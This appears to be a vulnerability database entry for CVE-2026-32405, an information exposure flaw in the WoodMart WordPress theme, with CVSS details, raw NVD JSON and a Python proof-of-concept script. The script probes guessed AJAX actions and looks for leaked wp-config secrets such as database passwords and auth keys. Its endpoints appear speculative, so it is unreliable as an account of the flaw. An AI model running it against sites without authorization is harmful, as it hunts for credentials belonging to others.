Security Vulnerability Report
中文
CVE-2026-32405 CVSS 5.3 MEDIUM

CVE-2026-32405

Published: 2026-03-13 19:54:57
Last Modified: 2026-04-22 21:30:26

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in xtemos WoodMart woodmart allows Retrieve Embedded Sensitive Data.This issue affects WoodMart: from n/a through <= 8.3.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WoodMart Theme <= 8.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32405 PoC - WoodMart Theme Sensitive Information Exposure # Affected Version: WoodMart Theme <= 8.3.9 # CVSS 3.1: 5.3 (Medium) import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site with WoodMart theme is vulnerable to CVE-2026-32405 sensitive information exposure. """ # Common WoodMart AJAX endpoints that might expose information ajax_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/woodmart/v1/", "/?rest_route=/woodmart/v1/" ] # Potential sensitive data exposure indicators sensitive_patterns = [ b"DB_NAME", b"DB_USER", b"DB_PASSWORD", b"AUTH_KEY", b"SECURE_AUTH_KEY", b"WP_DEBUG", b"ABSPATH", b"table_prefix" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-32405 - WoodMart Theme Information Disclosure") print("=" * 60) vulnerable = False for endpoint in ajax_endpoints: url = target_url.rstrip('/') + endpoint # Test various WoodMart AJAX actions actions = [ "woodmart_update_wishlist", "woodmart_ajax_action", "woodmart_get_shortcode_content", "woodmart_get_wishlist_content" ] for action in actions: try: data = { "action": action, "data": "test" } response = requests.post(url, data=data, timeout=10, verify=False) # Check for sensitive information in response for pattern in sensitive_patterns: if pattern in response.content: print(f"[!] VULNERABLE: Found sensitive pattern '{pattern.decode()}' in {url}") print(f"[!] Action: {action}") print(f"[!] Response length: {len(response.content)} bytes") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") if not vulnerable: print("[*] Target does not appear to be vulnerable to CVE-2026-32405") print("[*] Note: Manual verification may be required") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32405-poc.py <target_url>") print("Example: python cve-2026-32405-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32405", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:56.883", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in xtemos WoodMart woodmart allows Retrieve Embedded Sensitive Data.This issue affects WoodMart: from n/a through <= 8.3.9."}, {"lang": "es", "value": "Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada vulnerabilidad en xtemos WoodMart woodmart permite la Recuperación de Datos Sensibles Incrustados. Este problema afecta a WoodMart: desde n/a hasta &lt;= 8.3.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/woodmart/vulnerability/wordpress-woodmart-theme-8-3-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}